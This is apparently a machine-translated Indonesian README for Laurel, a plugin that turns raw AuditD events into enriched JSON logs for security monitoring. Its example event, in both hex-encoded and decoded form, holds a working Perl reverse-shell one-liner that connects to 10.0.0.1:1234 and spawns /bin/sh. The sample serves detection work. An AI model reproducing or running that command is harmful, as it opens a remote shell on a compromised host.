laurel
v0.6.4
Laurel adalah plugin pasca-pemrosesan acara untuk AuditD (8) yang menghasilkan log audit berbasis JSON yang berguna dan diperkaya yang cocok untuk pengaturan pemantauan keamanan modern.
Dokumentasi yang sesuai dengan rilis stabil terbaru dapat ditemukan di sini.
TLDR: Alih -alih acara audit yang terlihat seperti ini…
type=EXECVE msg=audit(1626611363.720:348501): argc=3 a0="perl" a1="-e" a2=75736520536F636B65743B24693D2231302E302E302E31223B24703D313233343B736F636B65742…
… Laurel mengubahnya menjadi log JSON di mana kekacauan yang menjadi penguji penyerang/penetrasi/tim merah berusaha menjadi jelas pada pandangan pertama:
{ … "EXECVE":{ "argc": 3,"ARGV": ["perl", "-e", "use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};"]}, …}
Ini terjadi di sumbernya karena Laurel berjalan di host tempat acara audit dihasilkan. Acara diperkaya dengan informasi yang berguna tentang proses induk (PPID):
"PPID":{"EVENT_ID":"1643635026.276:327308","comm":"sh","exe":"/usr/bin/dash","ppid":3190631}
Konfigurasi dan detail operasional dijelaskan dalam halaman manual Laurel (8). Detail tentang format log dan rasional dapat ditemukan di halaman manual Laurel-About (7). Halaman Laurel-Audit-Rules (7) berisi saran dan contoh untuk mengkonfigurasi aturan audit yang berguna untuk mendeteksi taktik penyerang.
Instruksi instalasi Laurel berisi instruksi tentang cara membangun Laruel dari sumber dan cara menginstal dan mengonfigurasinya.
Kami mengembangkan Laurel karena kami tidak puas dengan set fitur dan karakteristik kinerja dari proyek dan produk yang ada. Silakan merujuk ke dokumen kinerja untuk detailnya.
Lisensi Publik Umum GNU, Versi 3
Logo ini dibuat oleh Birgit Meyer <[email protected]>.
